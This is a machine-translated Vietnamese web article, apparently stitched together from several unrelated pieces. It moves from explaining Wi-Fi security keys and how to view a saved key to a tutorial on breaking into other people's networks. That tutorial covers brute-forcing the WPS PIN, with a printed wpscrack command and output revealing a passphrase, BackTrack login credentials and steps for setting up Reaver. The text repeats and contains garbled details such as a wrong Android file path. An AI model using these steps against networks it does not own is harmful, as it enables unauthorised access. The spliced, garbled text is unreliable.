Khóa bảo mật mạng Rostelecom: cách tìm hiểu trên các bộ định tuyến khác nhau. Thiết lập khóa bảo mật không dây

Dữ liệu cá nhân và các tập tin trên mạng không dây đôi khi có thể bị truy cập bởi những người không được phép chặn tín hiệu mạng. Điều này có thể dẫn đến việc đánh cắp danh tính và các hoạt động độc hại khác. Khóa hoặc cụm mật khẩu bảo mật mạng có thể giúp bảo vệ mạng không dây của bạn khỏi sự truy cập trái phép như vậy.

Làm theo Trình hướng dẫn Thiết lập Mạng để định cấu hình khóa bảo mật.

Ghi chú.

  • Không nên sử dụng WEP để bảo mật mạng không dây của bạn. Truy cập được bảo vệ bằng Wi-Fi (WPA hoặc WPA2) đáng tin cậy hơn. Nếu bạn cố gắng sử dụng WPA và WPA2 và chúng không hoạt động, chúng tôi khuyên bạn nên thay thế bộ điều hợp mạng bằng bộ điều hợp hỗ trợ WPA hoặc WPA2. Tất cả các thiết bị mạng, máy tính, bộ định tuyến và điểm truy cập cũng phải hỗ trợ WPA hoặc WPA2.

Phương pháp mã hóa cho mạng không dây

Ngày nay, có ba loại mã hóa không dây: Truy cập được bảo vệ Wi-Fi (WPA và WPA2), Quyền riêng tư tương đương có dây (WEP) và 802.1x. Hai phương pháp đầu tiên được mô tả chi tiết trong các phần sau. Giao thức 802.1x thường được sử dụng trong các mạng công ty và không được thảo luận ở đây.

Truy cập được bảo vệ Wi-Fi (WPA và WPA2)

WPA và WPA2 yêu cầu người dùng cung cấp khóa bảo mật để kết nối. Sau khi khóa được xác minh, tất cả dữ liệu được truyền giữa máy tính hoặc thiết bị và điểm truy cập sẽ được mã hóa.

Có hai loại xác thực WPA: WPA và WPA2. Sử dụng WPA2 bất cứ khi nào có thể vì nó mang lại sự bảo mật cao nhất. Hầu như tất cả các bộ điều hợp mạng không dây mới đều hỗ trợ WPA và WPA2, nhưng một số mẫu cũ hơn thì không. Trong WPA-Personal và WPA2-Personal, tất cả người dùng đều được gán cùng một cụm mật khẩu. Chế độ này được khuyên dùng cho mạng gia đình. WPA-Enterprise và WPA2-Enterprise được thiết kế để sử dụng với máy chủ xác thực 802.1x, cung cấp các khóa khác nhau cho tất cả người dùng. Chế độ này được sử dụng chủ yếu trên các mạng làm việc.

Giao thức WEP (Quyền riêng tư tương đương có dây)

WEP là một phương pháp bảo mật mạng cũ hơn. Nó vẫn có sẵn để hỗ trợ các thiết bị cũ, nhưng việc sử dụng nó không được khuyến khích. Kích hoạt WEP sẽ cấu hình khóa bảo mật mạng. Khóa này mã hóa thông tin mà máy tính truyền qua mạng tới các máy tính khác. Tuy nhiên, bảo mật WEP tương đối dễ bị phá vỡ.

Có hai loại phương thức bảo mật WEP: xác thực hệ thống mở và xác thực khóa chung. Cả hai đều không cung cấp mức độ bảo mật cao nhưng phương thức xác thực khóa chung lại kém an toàn hơn. Đối với hầu hết các máy tính và điểm truy cập không dây, khóa xác thực khóa dùng chung giống với khóa mã hóa WEP tĩnh được sử dụng để bảo mật mạng. Kẻ tấn công chặn các thông báo xác thực khóa chia sẻ thành công có thể sử dụng các công cụ đánh hơi để xác định khóa xác thực khóa chia sẻ và sau đó là khóa mã hóa WEP tĩnh. Khi khóa mã hóa WEP tĩnh được xác định, kẻ tấn công có thể có toàn quyền truy cập vào mạng. Vì lý do này, phiên bản Windows này không tự động hỗ trợ cấu hình mạng thông qua xác thực khóa chia sẻ WEP.

Nếu, bất chấp những cảnh báo này, việc xác thực bằng khóa chia sẻ WEP là bắt buộc, hãy làm theo các bước sau:

Mạng không dây là một cách rất nhanh chóng và thuận tiện để kết nối Internet, tạo nhóm mạng, truyền dữ liệu và nhiều chức năng hữu ích khác mà mọi chủ sở hữu PC hoặc thiết bị di động đều sử dụng hàng ngày.

Các loại mạng không dây chính:

1) Loại Wi-Fi đầu tiên là truy cập “mở” (phổ biến nhất và được mọi người yêu thích)

2) Thứ hai, tương ứng, với “đóng”

(đáng tin cậy hơn và thường có tốc độ tốt hơn do số lượng thiết bị được kết nối ít). Nhưng nó yêu cầu khóa bảo mật mạng Wi-Fi mà bạn có thể lấy từ quản trị viên mạng.

Trên PC, Wi-Fi không có mật khẩu được mô tả dưới dạng ăng-ten.

Trên thiết bị di động, mạng mở không có biểu tượng bổ sung, không giống như mạng đóng, có hình ảnh chiếc khóa bên cạnh.

Với mạng không mật khẩu, điều rõ ràng là: bạn đã chọn nó, kết nối và mọi thứ đều hoạt động, điều đó xảy ra là bạn cần phải thực hiện ủy quyền bằng số điện thoại của mình, nhưng điều này hơi lạc đề. Phải làm gì với các điểm truy cập đã đóng, tôi có thể tìm mật khẩu ở đâu? Đầu tiên bạn cần hiểu khóa bảo mật mạng là gì, nó hoạt động như thế nào và tại sao lại cần thiết.

Khóa hoặc mật khẩu là một bộ ký tự duy nhất nhất định, do người dùng tùy ý đặt, được sử dụng để truy cập mạng cũng như mã hóa dữ liệu được truyền trong đó. Mục đích chính của khóa là tăng cường an ninh mạng.

Dữ liệu được mã hóa bằng các công nghệ sau:

o Sau khi thiết lập loại mã hóa này, người dùng sẽ cần nhập mã bảo mật, bộ định tuyến sẽ kiểm tra dữ liệu đã nhập và cung cấp quyền truy cập vào mạng hoặc chỉ ra mật khẩu không chính xác.

o Loại bảo mật mạng này đã lỗi thời nhưng vẫn được sử dụng do loại thiết bị cụ thể hỗ trợ nó. Công nghệ này kém an toàn hơn và có thể dễ dàng bị hack; việc sử dụng nó không được khuyến khích.

Đặt mật khẩu trên bộ định tuyến.

Lấy bộ định tuyến TP-Link WR841N / WR841ND làm ví dụ, chúng ta sẽ xem cách tìm khóa bảo mật mạng không dây, cách xem, cách thay đổi hoặc xóa hoàn toàn.

Để truy cập menu cài đặt bộ định tuyến, hãy cắm cáp mạng vào cổng bộ định tuyến và card mạng của PC, sau đó nhập giá trị sau vào thanh địa chỉ:

Nhập quản trị viên vào trường đăng nhập và mật khẩu, sau đó nhấp vào đăng nhập.

Mật khẩu của bạn sẽ được chỉ định trong trường được đánh dấu. Bạn luôn có thể thay đổi mật khẩu này bằng cách nhập dữ liệu đáp ứng các điều kiện được chỉ định bên dưới. Mọi thay đổi trong cài đặt trên bộ định tuyến đều được xác nhận bằng cách nhấp vào nút “Lưu”. Người dùng có quyền truy cập vào menu cài đặt bộ định tuyến có thể thay đổi khóa này.

Phương pháp được mô tả ở trên cho thấy cách thay đổi mật khẩu, loại mã hóa hoặc đơn giản là xem dữ liệu. Nếu cần tìm khóa bảo mật trên máy tính của bạn, việc này có thể được thực hiện từ menu “Thuộc tính” của kết nối có sẵn.

Để xem khóa, hãy chọn hộp kiểm “Hiển thị các ký tự đã nhập”.

Giá trị mật khẩu không thể thay đổi trong cửa sổ này. Nó chỉ dùng để hiển thị mã đã nhập trong lần “kết nối” đầu tiên.

Khi kết nối với mạng mới, cửa sổ sau sẽ mở ra:

Trong trường hợp kết hợp các ký tự phức tạp, bạn có thể sao chép mật khẩu và dán vào trường khóa (nếu có ở định dạng văn bản), để bảo mật, bằng cách chọn hộp kiểm “Ẩn ký tự”, mật khẩu sẽ được hiển thị dưới dạng dấu hoa thị, sau đó nhấp vào OK. Nếu mã không chính xác, hãy thử lại nhưng nhập mật khẩu theo cách thủ công, quan sát cẩn thận chuỗi ký hiệu và dấu hiệu.

Để hiểu cách tìm ra khóa bảo mật mạng trên điện thoại di động, bạn phải có quyền nâng cao để định cấu hình tiện ích hoặc sử dụng các chương trình chuyên dụng bằng cách tải chúng xuống từ Internet.

Nếu bạn là quản trị viên mạng của mình hoặc đơn giản là cài đặt bộ định tuyến ở nhà để kết nối không dây, thì hãy cố gắng hạn chế người lạ có thể kết nối vào mạng của bạn, đưa ra các tổ hợp mật khẩu phức tạp. Làm cách nào bạn có thể tìm thấy mật khẩu của bộ định tuyến mới bạn vừa mua? Chỉ cần kết nối nó với máy tính của bạn qua cáp mạng và đi tới menu “Cài đặt”, như được hiển thị ở trên trong ảnh “Menu Cài đặt”.

Video về chủ đề

Chúc bạn có Internet vui vẻ!

Khi kết nối với mạng không dây Wi-Fi, người dùng thường phải đối mặt với việc phải nhập một khóa bảo mật mạng nhất định. Trong bài viết này, chúng tôi sẽ cho bạn biết khóa bảo mật mạng không dây Wi-Fi là gì, cũng như cách tìm ra khóa này bằng cách sử dụng cài đặt của bộ định tuyến, máy tính hoặc máy tính xách tay nơi nó được lưu.

Để hiểu khóa bảo mật là gì, bạn cần nói đôi lời về các loại mạng Wi-Fi khác nhau. Mạng Wi-Fi có thể mở hoặc an toàn. Mạng mở không được bảo vệ dưới bất kỳ hình thức nào và bạn không cần nhập bất kỳ dữ liệu nào để kết nối với mạng đó. Bất kỳ ai cũng có thể kết nối với mạng mở, điều chính là phải ở trong phạm vi phủ sóng của mạng. Điều này rất thuận tiện cho việc cung cấp truy cập Internet ở những nơi công cộng. Ngược lại, một mạng an toàn không dành cho người dùng thông thường. Mạng an toàn thường được sử dụng để xây dựng mạng không dây văn phòng, cơ quan và gia đình. Để kết nối với mạng như vậy, bạn cần biết một bộ ký tự bí mật, được gọi là khóa hoặc mật khẩu bảo mật Wi-Fi.

Nói chung, khóa bảo mật Wi-Fi là mật khẩu mà bạn cần biết để kết nối với mạng. Khi bạn kết nối với mạng an toàn, thiết bị bạn đang sử dụng chắc chắn sẽ yêu cầu bạn nhập khóa bảo mật hoặc mật khẩu. Sau khi nhập thông tin này, mật khẩu đã nhập sẽ được kiểm tra tính chính xác và nếu mật khẩu đúng thì kết nối sẽ diễn ra. Nếu mật khẩu không chính xác, kết nối sẽ bị chấm dứt.

Cần lưu ý rằng có một số nhầm lẫn về mặt thuật ngữ ở đây. Trên một số thiết bị (ví dụ: thiết bị di động có hệ điều hành Android hoặc iOS), khóa bảo mật này được gọi là mật khẩu. Nghĩa là, người dùng được yêu cầu nhập mật khẩu và anh ta ngay lập tức hiểu những gì anh ta yêu cầu để kết nối với mạng.

Đồng thời, trên máy tính xách tay và máy tính chạy hệ điều hành Windows, một cái tên chính xác hơn được sử dụng là “khóa bảo mật”. Việc sử dụng thuật ngữ "khóa bảo mật" thường khiến những người dùng thiếu kinh nghiệm bối rối vì họ không hiểu những gì họ yêu cầu.

Cách tìm khóa bảo mật mạng không dây của bạn

Khóa bảo mật Wi-Fi được cài đặt trên thiết bị tạo mạng không dây này. Đây có thể là bộ định tuyến không dây hoặc điểm truy cập Wi-Fi. Do đó, cách đáng tin cậy nhất để tìm ra khóa bảo mật Wi-Fi là vào phần cài đặt của bộ định tuyến hoặc điểm truy cập và xem xét.

Để thực hiện việc này, trước tiên bạn cần kết nối với mạng của bộ định tuyến này. Việc này có thể được thực hiện qua cáp hoặc qua Wi-Fi (khi được kết nối qua Wi-Fi, quyền truy cập vào cài đặt có thể bị chặn). Tiếp theo, bạn cần mở bất kỳ trình duyệt nào và nhập địa chỉ IP của bộ định tuyến vào thanh địa chỉ (thường là 192.168.0.1 hoặc 192.168.1.1).

Sau đó, bạn sẽ được yêu cầu nhập tên người dùng (đăng nhập) và mật khẩu. Thông tin đăng nhập và mật khẩu tiêu chuẩn thường được chỉ định ở mặt dưới của bộ định tuyến; thông tin này cũng có trong hướng dẫn dành cho bộ định tuyến.

Sau khi nhập tên người dùng và mật khẩu, bạn sẽ được đưa đến giao diện web của bộ định tuyến. Tại đây bạn cần tìm phần có cài đặt Wi-Fi. Thông thường phần này được gọi là Wi-Fi, Mạng không dây, WLAN hoặc Mạng không dây. Trong phần cài đặt Wi-Fi, bạn có thể tìm thấy khóa bảo mật cần thiết để kết nối.

Nếu bạn có một máy tính đã lưu khóa bảo mật thì bạn có thể thực hiện việc đó mà không cần vào cài đặt bộ định tuyến. Để thực hiện việc này, bạn cần mở Trung tâm Mạng và Chia sẻ. Trong Windows 7, để thực hiện việc này, bạn cần nhấp chuột phải vào biểu tượng kết nối mạng hoặc vào “Bảng điều khiển” và mở phần “Mạng và Internet - Trung tâm Mạng và Chia sẻ”.

Trong Windows 10, cách dễ nhất để thực hiện việc này là sử dụng menu Run. Nhấn tổ hợp phím Windows-R và chạy lệnh “control.exe /name Microsoft.NetworkandSharingCenter”.

Trong cửa sổ Network and Sharing Center, nhấp vào liên kết Quản lý mạng không dây.

Tại đây, bạn cần tìm mạng Wi-Fi mong muốn, nhấp chuột phải vào mạng đó và đi tới “Thuộc tính”.

Kết quả sẽ xuất hiện một cửa sổ với các thuộc tính của mạng Wi-Fi đã chọn. Để xem khóa bảo mật đã lưu, hãy chuyển đến tab “Bảo mật” và bật tùy chọn “Hiển thị các ký tự đã nhập”. Sau đó, dữ liệu bạn cần sẽ xuất hiện trong trường văn bản “Khóa bảo mật mạng”.

Nếu bạn không có quyền truy cập vào bộ định tuyến và không có mật khẩu đã lưu trên máy tính của mình thì bạn cần liên hệ với quản trị viên hệ thống hoặc nhà cung cấp dịch vụ Internet cung cấp dịch vụ cho mạng Wi-Fi của bạn để được trợ giúp.

Rõ ràng, không có ích gì khi nói rằng hầu hết người dùng đã gặp phải tình huống khi cố gắng kết nối với mạng không dây, hệ thống sẽ nhắc họ nhập cái gọi là khóa bảo mật mạng.

Nó là gì, nó dùng để làm gì và làm thế nào để nhận biết nó sẽ được thảo luận thêm. Hãy xem xét một số tùy chọn cho các hành động cơ bản sẽ hữu ích ngay cả với những người đã quên kết hợp đã thiết lập để kết nối qua Wi-Fi.

Khóa bảo mật mạng Wi-Fi: nó là gì và dùng để làm gì?

Hãy bắt đầu với định nghĩa của chính nó. An ninh mạng được tất cả người dùng máy tính và thiết bị di động biết đến. Nhìn vào cái tên trừu tượng, không phải ai cũng có thể hiểu được chúng ta đang nói đến điều gì.

Trên thực tế, đây là mật khẩu được đặt trong cài đặt kết nối không dây để ngăn người khác sử dụng nó và truy cập vào dữ liệu bí mật, chẳng hạn như khi tổ chức mạng không dây tại nhà với quyền truy cập chung vào các tệp và thư mục.

Nơi nhận khóa bảo mật mạng: tùy chọn

Nhiều người dùng giao việc cấu hình các tham số kết nối không dây cho chuyên gia của nhà cung cấp hoặc người quen bên ngoài thường quên ghi lại mật khẩu đã tạo. Và chỉ sau đó, chẳng hạn, khi khôi phục hệ thống sau những lỗi nghiêm trọng hoặc khi cài đặt lại hoàn toàn, họ mới cắn cùi chỏ, ghi nhớ tổ hợp cần thiết để truy cập kết nối và đau đớn tìm ra cách tìm ra chìa khóa. có thể thử các bước sau:

  • công cụ mạng cho hệ thống Windows dành cho máy tính để bàn và máy tính xách tay;
  • cài đặt thông số bộ định tuyến;
  • chương trình của bên thứ ba;
  • brute Force (sử dụng brute Force) để tính mật khẩu kết nối của người khác.

Nếu ba tùy chọn đầu tiên là tiêu chuẩn và được sử dụng trong tất cả các hệ thống Windows và khóa được xác định thông qua thiết bị di động, thì việc sử dụng vũ lực, từ quan điểm hợp pháp hoặc cân nhắc đạo đức và đạo đức, có thể bị coi là bất hợp pháp. hành động. Chúng tôi sẽ xem xét tất cả các lựa chọn, bao gồm cả sự can thiệp tổng thể, nhưng chỉ nhằm mục đích cung cấp thông tin chung.

Sử dụng cài đặt kết nối

Vậy làm cách nào để tìm ra khóa bảo mật mạng được đặt cho kết nối được định cấu hình trên máy tính hoặc máy tính xách tay của người dùng?

Trong trường hợp đơn giản nhất, khi làm việc với hệ điều hành Windows 7 trở xuống, sau khi gọi các thuộc tính của kết nối hiện tại, phần cần thiết có tab bảo mật sẽ ngay lập tức mở ra, trong đó bên dưới trường nhập mật khẩu, theo mặc định được hiển thị dưới dạng dấu hoa thị hoặc dấu chấm, bạn cần tích vào ô hiển thị các ký tự đã nhập. Sau khi hoàn thành các bước này, khóa bảo mật mạng có thể được ghi lại, sao chép hoặc lưu, chẳng hạn như trong tệp văn bản.

Tương tự, bạn có thể truy cập các cài đặt cần thiết trong Trung tâm Mạng và Chia sẻ, nằm trong Bảng điều khiển tiêu chuẩn (trong Windows 10, nó được gọi dễ dàng nhất bằng lệnh điều khiển trong bảng điều khiển Run). Tại đây, bạn chỉ cần chọn kết nối của mình, đi tới thuộc tính mạng không dây và sử dụng cùng một tab bảo mật.

Thông tin về khóa bảo mật trong cài đặt bộ định tuyến

Bạn có thể tìm ra khóa bảo mật mạng Wi-Fi một cách dễ dàng trong cài đặt bộ định tuyến. Để thực hiện việc này, trước tiên, thông qua bất kỳ trình duyệt có sẵn nào, bạn nên đăng nhập vào giao diện web của bộ định tuyến bằng cách nhập các tổ hợp như 192.168.0.1 hoặc 1.1 ở cuối thanh địa chỉ, nhập tên người dùng và mật khẩu của bạn (thường là quản trị viên cho cả hai trường) và sau đó vào menu bảo mật kết nối không dây (Wireless Security).

Ở đây, một trường đặc biệt sẽ được hiển thị, được chỉ định là Mật khẩu PSK hoặc thứ gì đó tương tự, trong đó tổ hợp quyền truy cập bắt buộc sẽ được đánh dấu.

Làm thế nào để tìm ra mật khẩu truy cập trên thiết bị di động?

Đối với thiết bị di động, họ cũng có thể sử dụng kích hoạt trường hiển thị mật khẩu. Tuy nhiên, không phải lúc nào cũng có thể xác định khóa bảo mật mạng theo cách này. Trong hệ điều hành Android, mật khẩu được ẩn khá sâu; việc tìm thấy mật khẩu mà không có quyền root có thể khá khó khăn. Tuy nhiên, nếu bạn cài đặt chúng, chẳng hạn như sử dụng cài đặt trình điều khiển Kingo Root và đảm bảo cho mình quyền siêu người dùng thì sẽ không có vấn đề gì.

Trong trường hợp này, bạn sẽ cần cài đặt thêm một số loại trình quản lý tệp như Root Explorer, đi tới đường dẫn data\music\wifi trên ổ đĩa trong, tìm tệp cấu hình wpa_supplicant.conf ở đó, mở nó bằng bất kỳ chương trình nào để làm việc với tài liệu văn bản (trình duyệt hoặc công cụ quản lý tích hợp) và tìm tên của mạng mong muốn (SSID). Bên cạnh tên, khóa bảo mật mạng cần thiết được sử dụng để truy cập sẽ được chỉ định.

Bạn cũng có thể sử dụng các ứng dụng đặc biệt như Mật khẩu WiFi, sau khi gọi, tất cả các kết nối đã từng được tạo từ thiết bị này sẽ được hiển thị. Tiếp theo, tất cả những gì còn lại là kích hoạt trường hiển thị khóa bảo mật mạng và xem dữ liệu cần thiết.

Lưu ý: trên thiết bị di động, tương tự như hệ thống Windows, bạn có thể nhập cài đặt của bộ định tuyến bạn đang sử dụng thông qua trình duyệt và xem mật khẩu trong các thông số của nó. Nhưng điều này khá bất tiện.

Tính mật khẩu cho kết nối của người khác

Đối với vũ lực, trong hầu hết các trường hợp, các chương trình chuyên dụng được sử dụng để bẻ khóa mật khẩu.

Đối với Windows, tiện ích phổ biến nhất là Aircrack-ng và dành cho thiết bị di động chạy hệ thống Android - chương trình WBR. Vì những lý do hiển nhiên, các câu hỏi liên quan đến việc sử dụng và hướng dẫn chi tiết sẽ không được thảo luận.

Cách đây không lâu, có vẻ như mạng không dây được bảo vệ bằng công nghệ WPA2 khá an toàn. Tìm một chiếc chìa khóa đơn giản để kết nối là điều thực sự có thể. Nhưng nếu bạn cài đặt một khóa thực sự dài, cả bảng cầu vồng và thậm chí cả khả năng tăng tốc GPU đều không giúp bạn khắc phục được. Tuy nhiên, hóa ra, bạn có thể kết nối với mạng không dây mà không cần điều này - bằng cách tận dụng lỗ hổng được phát hiện gần đây trong giao thức WPS.

CẢNH BÁO

Tất cả thông tin được trình bày chỉ nhằm mục đích giáo dục. Việc xâm nhập vào mạng không dây của người khác có thể dễ dàng bị coi là hành vi phạm tội hình sự. Hãy suy nghĩ bằng cái đầu của bạn.

Cái giá của sự đơn giản hóa

Ngày càng có ít điểm truy cập mở mà bạn không cần nhập khóa để kết nối. Có vẻ như chúng sẽ sớm được ghi vào Sách đỏ. Nếu trước đây một người thậm chí có thể không biết rằng mạng không dây có thể bị khóa bằng chìa khóa, bảo vệ bản thân khỏi các kết nối bên ngoài thì giờ đây, anh ta ngày càng được thông báo về khả năng này. Lấy ví dụ, chương trình cơ sở tùy chỉnh mà các nhà cung cấp hàng đầu phát hành cho các mẫu bộ định tuyến phổ biến để đơn giản hóa việc thiết lập. Bạn cần chỉ định hai thứ - thông tin đăng nhập/mật khẩu và... chìa khóa để bảo vệ mạng không dây. Quan trọng hơn, chính các nhà sản xuất phần cứng cố gắng làm cho quá trình thiết lập trở nên đơn giản. Do đó, hầu hết các bộ định tuyến hiện đại đều hỗ trợ cơ chế WPS (Wi-Fi Protected Setup). Với sự trợ giúp của nó, người dùng có thể thiết lập một mạng không dây an toàn chỉ trong vài giây mà không cần bận tâm đến thực tế là “bạn cần kích hoạt mã hóa ở một nơi khác và đăng ký khóa WPA”. Tôi đã nhập mã PIN tượng trưng gồm tám chữ số vào hệ thống, mã này được ghi trên bộ định tuyến và bạn đã hoàn tất! Và đây, hãy giữ chặt nhé. Vào tháng 12, hai nhà nghiên cứu đã nói về những sai sót cơ bản nghiêm trọng trong giao thức WPS. Nó giống như một cửa sau cho bất kỳ bộ định tuyến nào. Hóa ra là nếu WPS được kích hoạt tại điểm truy cập (trong một thời điểm, được bật trong hầu hết các bộ định tuyến theo mặc định), thì bạn có thể chọn mã PIN để kết nối và trích xuất khóa để kết nối trong vài giờ!

WPS hoạt động như thế nào?

Ý tưởng của những người tạo ra WPS là tốt. Cơ chế tự động đặt tên mạng và mã hóa. Do đó, người dùng không cần phải vào giao diện web và xử lý các cài đặt phức tạp. Và bạn có thể dễ dàng thêm bất kỳ thiết bị nào (ví dụ: máy tính xách tay) vào mạng đã được định cấu hình: nếu bạn nhập đúng mã PIN, thiết bị sẽ nhận được tất cả các cài đặt cần thiết. Điều này rất thuận tiện, đó là lý do tại sao tất cả các hãng lớn trên thị trường (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) hiện đều cung cấp bộ định tuyến không dây có hỗ trợ WPS. Chúng ta hãy xem xét nó chi tiết hơn một chút.

Có ba tùy chọn để sử dụng WPS:

  1. Kết nối bằng nút nhấn (PBC). Người dùng nhấn một nút đặc biệt trên bộ định tuyến (phần cứng) và trên máy tính (phần mềm), từ đó kích hoạt quá trình thiết lập. Chúng tôi không quan tâm đến điều này.
  2. Nhập mã PIN vào giao diện web. Người dùng truy cập vào giao diện quản trị của bộ định tuyến thông qua trình duyệt và nhập mã PIN gồm 8 chữ số được ghi trên thân thiết bị (Hình 1), sau đó quá trình thiết lập sẽ diễn ra. Phương pháp này phù hợp hơn với cấu hình ban đầu của bộ định tuyến, vì vậy chúng tôi cũng sẽ không xem xét nó.
  3. Nhập mã PIN trên máy tính người dùng (Hình 2). Khi kết nối với bộ định tuyến, bạn có thể mở một phiên WPS đặc biệt, trong đó bạn có thể định cấu hình bộ định tuyến hoặc nhận các cài đặt hiện có nếu bạn nhập chính xác mã PIN. Điều này đã hấp dẫn rồi. Không cần xác thực để mở một phiên như vậy. Bất cứ ai cũng có thể làm điều này! Hóa ra mã PIN đã có khả năng dễ bị tấn công vũ phu. Nhưng đây chỉ là những bông hoa.

Tính dễ bị tổn thương

Như tôi đã lưu ý trước đó, mã PIN bao gồm tám chữ số - do đó, có 10^8 (100.000.000) tùy chọn để khớp. Tuy nhiên, số lượng tùy chọn có thể giảm đáng kể. Thực tế là chữ số cuối cùng của mã PIN là một loại tổng kiểm tra, được tính dựa trên bảy chữ số đầu tiên. Kết quả là chúng tôi đã nhận được 10^7 (10.000.000) tùy chọn. Nhưng đó không phải là tất cả! Tiếp theo, chúng ta xem xét kỹ thiết bị của giao thức xác thực WPS (Hình 3). Có cảm giác như nó được thiết kế đặc biệt để chừa chỗ cho vũ lực. Hóa ra việc xác minh mã PIN được thực hiện theo hai giai đoạn. Nó được chia thành hai phần bằng nhau và mỗi phần đều được kiểm tra riêng! Chúng ta hãy nhìn vào sơ đồ:

  1. Nếu sau khi gửi tin nhắn M4, kẻ tấn công nhận được phản hồi EAP-NACK thì kẻ tấn công có thể chắc chắn rằng phần đầu tiên của mã PIN không chính xác.
  2. Nếu anh ta nhận được EAP-NACK sau khi gửi M6, thì phần thứ hai của mã PIN không chính xác. Chúng ta có 10^4 (10.000) lựa chọn cho hiệp một và 10^3 (1.000) cho hiệp hai. Kết quả là chúng tôi chỉ có 11.000 tùy chọn để tìm kiếm đầy đủ. Để hiểu rõ hơn cách thức hoạt động của nó, hãy nhìn vào sơ đồ.
  3. Một điểm quan trọng là tốc độ tìm kiếm có thể. Nó bị giới hạn bởi tốc độ bộ định tuyến xử lý các yêu cầu WPS: một số điểm truy cập sẽ tạo ra kết quả mỗi giây, một số khác sẽ tạo ra kết quả cứ sau 10 giây. Phần lớn thời gian được dành cho việc tính toán khóa chung bằng thuật toán Diffie-Hellman; nó phải được tạo trước bước M3. Có thể giảm thời gian dành cho việc này bằng cách chọn một khóa bí mật đơn giản ở phía máy khách, điều này sẽ đơn giản hóa việc tính toán các khóa khác trong tương lai. Thực tiễn cho thấy rằng để có được kết quả thành công, thông thường chỉ cần thực hiện một nửa trong số tất cả các lựa chọn là đủ và trung bình, bạo lực chỉ mất bốn đến mười giờ.

Thực hiện lần đầu

Việc triển khai vũ lực đầu tiên xuất hiện là tiện ích wpscrack (goo.gl/9wABj), được viết bởi nhà nghiên cứu Stefan Viböck bằng Python. Tiện ích này sử dụng thư viện Scapy, cho phép bạn chèn các gói mạng tùy ý. Tập lệnh chỉ có thể chạy trong hệ thống Linux, sau lần đầu tiên chuyển giao diện không dây sang chế độ giám sát. Là tham số, bạn phải chỉ định tên của giao diện mạng trong hệ thống, địa chỉ MAC của bộ điều hợp không dây, cũng như địa chỉ MAC của điểm truy cập và tên của nó (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer bắt đầu thử 00000000 lần thử 0,95 giây thử 00010009<...>thử 18660005 lần thử mất 1,08 giây thử 18670004# được tìm thấy Nửa lần thử mã PIN đầu tiên mất 1,09 giây thử 18670011 lần thử mất 1,08 giây<...>đang thử 18674095# tìm thấy nửa sau của mã PIN<...>Khóa mạng: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F thực_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Như bạn có thể thấy, nửa đầu tiên của mã PIN đã được chọn, sau đó là nửa thứ hai và cuối cùng, chương trình đã tạo ra một khóa sẵn sàng sử dụng để kết nối với mạng không dây. Thật khó để tưởng tượng sẽ mất bao lâu để tìm ra khóa có độ dài này (61 ký tự) bằng các công cụ có sẵn. Tuy nhiên, wpscrack không phải là tiện ích duy nhất để khai thác lỗ hổng và đây là một khoảnh khắc khá buồn cười: cùng lúc đó, một nhà nghiên cứu khác, Craig Heffner từ Strategic Network Solutions, cũng đang nghiên cứu vấn đề tương tự. Nhận thấy một PoC đang hoạt động để thực hiện một cuộc tấn công đã xuất hiện trên Internet, anh ấy đã xuất bản tiện ích Reaver của mình. Nó không chỉ tự động hóa quá trình chọn WPS-PIN và trích xuất khóa PSK mà còn cung cấp nhiều cài đặt hơn để có thể thực hiện cuộc tấn công đối với nhiều loại bộ định tuyến. Ngoài ra, nó hỗ trợ số lượng bộ điều hợp không dây lớn hơn nhiều. Chúng tôi quyết định lấy nó làm cơ sở và mô tả chi tiết cách kẻ tấn công có thể sử dụng lỗ hổng trong giao thức WPS để kết nối với mạng không dây an toàn.

LÀM CÁCH NÀO ĐỂ

Giống như bất kỳ cuộc tấn công nào khác vào mạng không dây, chúng tôi sẽ cần Linux. Ở đây phải nói rằng Reaver có mặt trong kho của bản phân phối BackTrack nổi tiếng, kho này cũng đã bao gồm các trình điều khiển cần thiết cho các thiết bị không dây. Vì vậy, chúng tôi sẽ sử dụng nó một cách chính xác.

Bước 0. Chuẩn bị hệ thống

Trên trang web chính thức, BackTrack 5 R1 có sẵn để tải xuống dưới dạng máy ảo trong VMware và ảnh ISO có thể khởi động. Tôi đề nghị lựa chọn cuối cùng. Bạn có thể chỉ cần ghi hình ảnh vào đĩa hoặc có thể sử dụng chương trình để tạo ổ flash USB có khả năng khởi động: bằng cách này hay cách khác, sau khi khởi động từ phương tiện như vậy, chúng ta sẽ ngay lập tức có một hệ thống sẵn sàng hoạt động mà không gặp bất kỳ sự cố không cần thiết nào.

Khóa học cấp tốc về hack Wi-Fi

  1. WEP (Quyền riêng tư tương đương có dây) Công nghệ đầu tiên để bảo vệ mạng không dây hóa ra lại cực kỳ yếu. Bạn có thể hack nó theo đúng nghĩa đen trong vài phút bằng cách sử dụng điểm yếu của mật mã RC4 được sử dụng trong đó. Các công cụ chính ở đây là airodump-ng sniffer để thu thập các gói và tiện ích aircrack-ng, được sử dụng trực tiếp để bẻ khóa. Ngoài ra còn có một công cụ đặc biệt wesside-ng, thường tự động hack tất cả các điểm WEP gần đó.
  2. WPA/WPA2 (Truy cập được bảo vệ không dây)

Brute Force là cách duy nhất để tìm khóa cho mạng WPA/WPA2 đóng (và thậm chí chỉ khi có một kết xuất của cái gọi là Bắt tay WPA, được phát sóng khi máy khách kết nối với một điểm truy cập).

Sức mạnh tàn bạo có thể kéo dài nhiều ngày, nhiều tháng và nhiều năm. Để tăng hiệu quả tìm kiếm, các từ điển chuyên dụng lần đầu tiên được sử dụng, sau đó tạo bảng cầu vồng và sau đó xuất hiện các tiện ích sử dụng công nghệ NVIDIA CUDA và ATI Stream để tăng tốc phần cứng quá trình sử dụng GPU. Các công cụ được sử dụng là aircrack-ng (sử dụng từ điển), cowpatty (sử dụng bảng Rainbow), pyrit (sử dụng card màn hình).

Bước 1: Đăng nhập

Tên đăng nhập và mật khẩu mặc định là root:toor. Khi ở trong bảng điều khiển, bạn có thể khởi động “X” một cách an toàn (có các tập hợp BackTrack riêng biệt - cả với Gnome và KDE):

#startx

Bước 2: Cài đặt Reaver

